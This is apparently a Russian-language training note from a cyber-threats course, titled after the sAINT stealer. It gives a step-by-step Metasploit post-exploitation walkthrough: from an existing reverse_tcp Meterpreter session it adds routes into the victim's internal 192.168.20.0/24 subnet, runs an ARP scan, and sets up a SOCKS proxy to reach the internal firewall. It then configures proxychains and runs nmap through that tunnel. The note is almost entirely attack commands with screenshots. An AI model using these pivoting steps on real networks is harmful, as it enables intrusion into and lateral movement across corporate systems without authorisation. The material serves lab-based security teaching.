# Stealers (sAINT) #### 1. Проведем атаку revers_tcp [Инструкция по настройке с прошлого урока](https://hackmd.io/_qkyluFDSeuE63lHwvchlQ?view#3-%D0%98%D1%81%D0%BF%D0%BE%D0%BB%D1%8C%D0%B7%D1%83%D0%B5%D0%BC-%D0%BF%D1%8D%D0%B9%D0%BB%D0%BE%D0%B0%D0%B4-meterpreter) #### 2. Эксплуатируем пэйлоад и атакуем внутренние узлы корпоративной сети > - Проверим в meterpreter какая сеть используется в инфраструктуре атакуемой машины - **`ipconfig`** > > ![](https://i.imgur.com/4g8DMb1.png) > > - роутим сеть атакованной винды > > - Первый способ > > **`run autoroute route -s 192.168.20.0/24`** > > Возможно этот способ может не отработать, если в винде юзер не с админ правами > > > - Второй способ > > 1. Прячем сессию в бэкграунд - **`bg`** > > 2. Используем скрипт - **`use post/multi/manage/autoroute`** > > 3. Смотрим какие необходимо прописать опции - **`show options`** > > 4. Указываем активную сессию - **`set session 4`** > > 5. Прописываем IP - **`set subnet 192.168.20.0`** > > 6. Запускаем - **`run`** > > > ![](https://i.imgur.com/EgpoVMp.png) > > > - Воспользуемся модулем **arp_scanner** в **meterpreter** > > > 1. Перейдем в активную сессию - **`session 4`** > > > 2. Просканируем сеть - **`run post/windows/gather/arp_scanner RHOSTS=192.168.20.0/24`** > > > ![](https://i.imgur.com/lMIn3wF.png) > > > - Используем **socks_proxy** делаем связку между metasploit framework и kali-linux > > 1. Отправим активную сессию в бэкграунд - **`bg`** > > 2. Используем скрипт прокси - **`use auxiliary/server/socks_proxy`** > > 3. Смотрим опции - **`show options`** > > 4. Укажем что прокси будет на нашем интерфейсе - **`set SRVHOST 172.30.51.90`** > > 5. Запускаем - **`run`** > > 6. В отдельном окне консоли проверим что прокся работает - > > **`ss -tunlp`** > > > ![](https://i.imgur.com/tbF6Vys.png) > > - Переходим к настройке браузера в нашей kali, чтобы могли открыть например **firewall** инфраструктуры > > ![](https://i.imgur.com/hmVneZ7.png) > > > Теперь есть доступ до FW > > > > ![](https://i.imgur.com/DyIJqHQ.png) > > > - Воспользуемся **proxychains** для связки машины которую атакуем с нашим созданным прокси > > > 1. Отредактируем файл - nano **`/etc/proxychains.conf`** > > 2. Для добавления нашего прокси в цепочку, пропишем его внизу этого файла - **`socks5 172.30.51.90 1080`** > > > ![](https://i.imgur.com/5Zjdbvu.png) > > > > 3. Проведем сканирование утилитой **nmap** через наш прокси-сервер - **`proxychains nmap -sT -sV -Pn -n -p22,80,445,135,139 192.168.20.10/24`** > > Для сканирования понадобится много времени ###### tags: `Cyber Infrastructure Threats`, `1 модуль`